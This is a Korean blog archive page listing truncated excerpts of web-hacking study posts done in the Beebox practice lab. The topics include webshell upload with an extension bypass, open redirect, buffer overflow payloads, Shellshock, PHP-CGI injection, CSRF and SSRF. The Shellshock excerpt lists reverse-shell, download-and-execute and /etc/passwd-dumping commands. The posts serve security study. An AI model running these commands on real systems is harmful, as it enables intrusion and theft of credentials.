본문 바로가기

_Metamong

Notice

Recent Posts

Popular Posts

Recent Comments

Link

Calendar

Tags

더보기

Archives

Visits

Today

Yesterday

Study records

Study records/Web hacking 2024. 7. 31. [Beebox] 파일 업로드 취약점 - 시스템 침투 파일 업로드 취약점 공격은 웹 서비스 첨부 파일, 환경 설정 미흡을 이용하여 악의적인 스크립트가 포함된 파일을 업로드한 후에 웹 서버에 침투를 하는 공격이다. 공격자는 서버 사이드 스크립트(PHP, JSP, .NET 등)을 이용하여 웹쉘(WebShell)을 제작한다. 칼리리눅스는 기본적으로 웹쉘을 가지고 있다. PHP로 작성된 이 백도어 스크립트는 공격자가 서버에 원격으로 접속하고 명령을 실행할 수 있게 해준다. 파일을 찾아서 업로드 '?cmd=cat+/etc/passwd'를 복사하여 URL에 붙여넣기하면 민간함 정보들이 그대로 유출된다. 보안 레벨을 한 단계 높여서 파일을 업로드하려니 막혔다. 한 번의 우회가 필요하다. 하지만 확장자만 바꿔주면 쉽게 우회할 수 있다. 'h..

Study records/Web hacking 2024. 7. 31. [Beebox] 검증되지 않은 리다이렉트와 포워드 포워드할 URL을 검증하지 않고 그대로 사용하여 발생하는 보안 취약점이다. 악성 웹 사이트나 피싱 페이지로 리다이렉트할 수 있도록 악용될 수 있다. Blog에 접속하면 아래와 같이 정삭적인 블로그 페이지에 접속된다. 버프스위트에서 HTTP 요청을 가로채어 URL 파라미터를 조작하여 다른 도메인으로 변경한다. 비박스에서 다시 블로그에 접속해보면 네이버로 접속된다. 검증되지 않은 리다이렉트와 포워드를 예방하는 방법은 리다이렉트할 URL을 검증하고, 외부 도메인으로의 리다이렉트를 제한한다. 그리고 외부 URL 대신 애플리케이션 내의 상대 경로를 사용하여 리다이렉트를 처리하고, 보안 토큰을 사용하여 리다이렉트 요청에 토큰을 포함시키고, 서버에서 이 토큰의 유효성을 확인한다.

Study records/Web hacking 2024. 7. 26. [Beebox] Buffer Overflow(Local) 버퍼 오버플로우는 메모리 관리의 오류를 이용한 취약점으로, 일반적으로 버퍼의 경계를 넘는 데이터를 쓰는 과정에서 발생한다. 먼저 Metasploit 데이터베이스를 초기화하고 콘솔 실행 'cmd' 옵션을 '/bin/ps'로 설정 -b '\x00' : 생성된 페이로드에서 널 바이트를 제거-e x86/opt_sub : x86/opt_sub 인코더를 사용하여 페이로드를 인코딩한다. 인코딩은 페이로드를 난독화하거나 특정 바이트 패턴을 피하기 위해 사용-f raw : 페이로드를 raw 형식으로 생성-o /tmp/payload.txt : 생성된 페이로드를 /tmp/payload.txt 파일에 저장 { echo -n \'; cat /tmp/payload.txt; echo -n \'; } : 이 부분은 작..

Study records/Web hacking 2024. 7. 25. [Beebox] ShellShock 취약점(CVE-2014-6271) - 2014년 9월 24일 스테판 챠젤라스(Stephane chazelas)에 의해 GNU Bash 공개- 공격 범위 : MAC OSX, Android, OpenBSD, DHCP Client, SSH Server, CGI나 Apache를 사용하는 웹서버, 공유기 등- 영향을 받는 버전 : GNU Bash 4.3 및 이전 버전 공격삽입 명령어리버스 셸 연결 /bin/bash -i /dev/tcp/loclhost/8081 0>&1악성파일 다운wget -O /tmp/syslogd http://localhost/prog; chmod 777 /tmp/syslogd; /tmp/syslogd;시스템 상태 체크/bin/ping -c localhost계정 탈취/bin/cat /etc/passwd > dumped_..

Study records/Web hacking 2024. 7. 25. [Beebox] PHP CGI RemoteExecution(CVE-2012-1823) 취약점 설명CGI 모드의 PHP:PHP는 다양한 실행 모드를 지원한다. 그 중 CGI 모드는 PHP를 웹 서버와 별도로 실행하는 방법 중 하나다. 웹 서버는 요청을 받아 PHP CGI 실행 파일로 전달하고, PHP CGI는 요청을 처리한 후 결과를 다시 웹 서버로 반환한다.취약점 발생 원인:이 취약점은 PHP CGI가 요청을 처리할 때 쿼리 문자열을 제대로 처리하지 않아 발생한다. 특정 요청 형식에서는 쿼리 문자열을 PHP 실행 인자로 해석하게 되어, 공격자가 임의의 PHP 설정이나 코드를 주입할 수 있다.공격 방식:공격자는 -d 옵션을 사용하여 PHP 설정을 변경하거나, -r 옵션을 사용하여 임의의 PHP 코드를 실행할 수 있다.http://target/cgi-bin/php?-d+allow_url_in..

Study records/Web hacking 2024. 7. 25. [Beebox] 크로스 사이트 요청 변조(비밀번호 변경/비밀번호 힌트 변경/계좌 이체) Change하기 전에 버프스위트 Intercept is on 후에 비밀번호를 변경한다. passowrd = metamong 변경 완료. Submit 후 비밀번호가 변경 되었는지 확인해본다. 이렇게 링크를 클릭하면 비밀번호 변경 요청을 특정 서버로 보내는 역할을 한다. Change전에 버프스위트 Intercept is on security level : high에서는 현재 비밀번호가 없으면 비밀번호 변경이 되지 않도록 하고 있다. 이 코드는 보안 수준이 MEDIUM 또는 HIGH일 때 작동한다.!isset($_REQUEST["token"])요청에 token이 설정되어 있는지 확인한다. 만약 설정되어 있지 않다면 조건문은 참이 된다.!isset($_SESSION["token"])세션..

Study records/Web hacking 2024. 7. 24. [Beebox] 기능 수준의 접근 통제 누락(디바이스 접근 제한/서버 측 요청 변조) 디바이스 접근 제한(Device Access Control)은 사용자나 애플리케이션이 특정 디바이스나 시스템 자원에 접근하는 것을 제어하는 기능이다. 이 기능이 제대로 구현되지 않으면, 악의적인 사용자가 본인에게 허용되지 않은 디바이스에 접근하거나 시스템 자원에 접근할 수 있다. SSRF(Server Side Request Forgery, 서버 측 요청 변조)은 공격자가 서버에 요청을 보내도록 유도하고, 그 요청을 변조하여 내부 네트워크의 비공식적인 리소스에 접근하거나 정보를 유출할 수 있는 공격이다. 서버가 신뢰할 수 없는 입력을 바탕으로 요청을 수행할 때 발생할 수 있다. 사용자가 입력한 IP 주소와 포트로 요청을 보내게 되므로, 서버가 내부 네트워크 자원이나 비공식적인 서..

Study records/Web hacking 2024. 7. 18. [Beebox] 기능 수준의 접근 통제 누락(디렉터리 리스팅/파일 삽입) 기능 수준의 접근 통제 누락이란 사용자가 애플리케이션 내에서 특정 기능이나 데이터를 접근할 때 적절한 권한 검사를 수행하지 않아서 발생하는 보안 취약점이다. 이는 권한이 없는 사용자가 관리자 기능이나 다른 사용자의 데이터를 접근하거나 수정할 수 있게 만드는 중요한 보안문제다. 디렉터리 리스팅은 웹 서버에서 특정 디렉터리에 대한 인덱스 파일(index.html 등)이 없을 때 서버가 해당 디렉터리 내의 모든 파일과 폴더 목록을 브라우저에 보여주는 현상을 말한다. 디렉터리 리스팅 방지 방법은 'httpd.conf' 또는 '.htaccess' 파일에서 디렉터리 리스팅을 비활성화 해준다. 그리고 각 디렉터리에 'index.html' 또는 'index.php'와 같은 인덱스 파일을 추가하여 디렉터리 목록..

이전 1 2 3 4 ··· 7 다음

티스토리툴바